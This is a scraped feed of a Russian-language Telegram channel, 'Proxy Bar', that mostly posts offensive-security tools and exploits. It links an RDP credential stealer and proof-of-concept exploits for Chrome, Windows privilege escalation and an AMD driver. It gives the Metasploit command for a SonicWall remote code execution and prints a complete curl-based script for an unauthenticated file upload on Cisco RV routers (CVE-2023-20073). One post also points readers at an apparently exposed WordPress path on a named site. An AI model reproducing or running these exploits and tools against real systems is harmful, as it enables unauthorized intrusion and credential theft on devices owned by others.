NEW BOT Телеграм, страница

Я календарь переверну
И снова RATник в сентябре

🔥22👍6😱2

6.6K views13:42

Proxy Bar

RDP Credential Stealer
*
download
*
HowToUse

#win #rdp

👍10🔥3

7.36K views05:09

Proxy Bar

Тревожные кадры, а еще там xmprpc есть
http://dramaalert.com/wp-includes/

👍10

6.5K views15:51

Proxy Bar

CVE-2023-3079 google chrome
*
exploit

🔥1

6.55K views16:51

Proxy Bar

Что, если вы запустите сканирование nmap и ВСЕ 65535 портов будут открыты?

-A PREROUTING -i eth0 -p tcp -m tcp --dport 23:65535 -j REDIRECT --to-ports 4444

Где 4444 HoneyPot, например.

#HA-HA

😱20👍10🔥8

7.39K views17:16

Proxy Bar

dir-300 еще никогда не был так опасен 😀

🔥75😱18👍8

7.53K views08:59

Proxy Bar

CVE-2023-20073
Загрузка произвольного файла без проверки подлинности (XSS) в VPN-маршрутизаторах:
Cisco RV340, RV340W, RV345, RV345P
Usage:

#!/usr/bin/bash
TARGET="https://0.0.0.0"; \
FILENAME="login.html"; \
echo "<b>CVE-2023-20073</b> exploit test.<br><noscript>alert('JS-test')</noscript>" > $FILENAME; \
curl -ksX POST "$TARGET/api/operations/ciscosb-file:form-file-upload" -H "Authorization: 1" -F "pathparam=Portal" -F "fileparam=${FILENAME}" -F "file.path=${FILENAME}" -F "file=@${FILENAME};type=application/octet-stream"; \
echo "Access the uploaded file through the following link: $TARGET/$FILENAME"

#cisco

👍14

7.03K views12:04

Proxy Bar

Отслеживание интересной малвари для Linux (и UNIX).
Трэкнуть

#linux #malware

👍11😱1

6.92K views05:02

Proxy Bar

OWASP Top 10 - video
*
download

🔥15👍2😱1

7.21K views11:57

Proxy Bar

CVE-2023-36874
уязвимость в службе отчетов об ошибках, связанная с повышением привилегий, позволявшая получить права администратора на устройстве Windows.
*
POC exploit
*
Read - exploit for 0-day Windows Error Reporting Service bug
#windows #lpe

🔥9👍2

7.39K viewsedited 08:49

Proxy Bar

HITCON 2023
Демонстрация использования AMDCpuProfiler.sys в AMD. Запуская произвольную запись токена EPROCESS, достигается повышение привилегий до уровня SYSTEM. Отключение флага DSE позволяет загружать вредоносный неподписанный драйвер. В презентации также демонстрируется атака на 360 Total Security путем аннулирования его ObRegisterCallbacks, что позволяет выполнять вредоносные действия в процессах 360 Total Security.
*
Exploit

#AMD

🔥7👍1

7.52K views14:41

Proxy Bar

Sonicwall rce CVE-2023-34124
*
metasploit
*

use exploit/multi/http/sonicwall_shell_injection_cve_2023_34124

ну да ну да 🙃
Эксплойт объединяет 4-5 различных уязвимостей. Благодаря @fulmetalpackets

🔥5👍2

7.12K viewsedited 19:22

Proxy Bar

xss.is вы там это, аккуратнее )

https://xss.is/proxy.php?image=https%3A%2F%2Fdownloader.disk.yandex.ru%2Fpreview%2F8884af4bd817bbf0937c044879e6bf34afb2d95c1f14c493b4e39564fbdd2475%2F606426dc%2FmzcuBYol1Yb8wOc9K6NXQ_yNT_4nE1QLJw4LTWRpVOT5DDi0QJok4134hlurUPrtjlev1Ud-HWDKjiPFVQAMJw%253D%253D%3Fuid%3D0%26filename%3D%25D0%2590%25D0%25BD%25D0%25B0%25D0%25BB%25D0%25B8%25D0%25B7%2520%25D0%25B7%25D0%25B0%25D1%2589%25D0%25B8%25D1%2589%25D0%25B5%25D0%25BD%25D0%25BD%25D0%25BE%25D1%2581%25D1%2582%25D0%25B8%2520%25D0%25B1%25D0%25B5%25D1%2581%25D0%25BF%25D1%2580%25D0%25BE%25D0%25B2%25D0%25BE%25D0%25B4%25D0%25BD%25D1%258B%25D1%2585%2520%25D1%2581%25D0%25B5%25D1%2582%25D0%25B5%25D0%25B9.%2520%25D0%25A7%25D0%25B0%25D1%2581%25D1%2582%25D1%258C%25201.mp4%26disposition%3Dinline%26hash%3D%26limit%3D0%26content_type%3Dimage%252Fjpeg%26owner_uid%3D0%26tknv%3Dv2%26crop%3D1%26size%3D200x200&hash=35623f35aff8fe146f0dd9044667024d&return_error=1

😱36🔥21👍1

7.27K views09:21

Proxy Bar

Exploitation of Openfire